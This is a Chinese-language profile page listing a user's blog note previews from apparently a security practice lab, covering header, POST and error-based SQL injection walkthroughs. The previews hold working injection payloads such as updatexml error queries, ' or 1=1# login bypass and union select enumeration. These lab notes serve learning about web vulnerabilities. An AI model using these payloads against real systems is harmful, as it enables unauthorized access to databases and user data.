Track 实习学员

kun

0关注
1粉丝
25文章
返回网站首页

您已发布 25篇文章作品写文章

kun head注入笔记

进入head注入靶场用burp suite抓包需要填写正确的用户名和密码 zkz zkz然后改user-agent参数 1'and updatexml(1,concat(0x7e,(select database())),1))#回显出数据库名security1' and updatexml(1,concat(0x7e,(select table_name from in

 2018-12-24
 0 
 37 

kun post注入笔记

来到熟悉的靶场post第一题页面显示登陆框先使用万能密码试试' or 1=1#成功登陆进去查询字段数' or 1=1 order by 1#查到字段数为2联合查询' or 1=2 union select 1,2# ,有回显查询数据库名称' or 1=2 union select 1,database()#查出数据库名为security使用语句' or 1=

 2018-12-22
 0 
 36 

kun 显错注入笔记

RANK1来到靶场首先就是?id=1正常显示 ?id=1 and 1=2也显示正常,发现单引号未闭合导致的所以?id=1' --+来闭合单引号再用?id=1’ order by 1--+正常显示但是到4也是显示出错,数据库有3个字段联合查询?id=1 ' and 1=2 union  select 1,2,3 --+ 有回显查数据库名 ?id=1'%20

 2018-12-21
 0 
 13 

kun 表单+后端

表单部分<!DOCTYPE html><html><head><meta charset="UTF-8"><title>index</title></head><body> <form name="form1" action="login

 2018-12-14
 0 
 22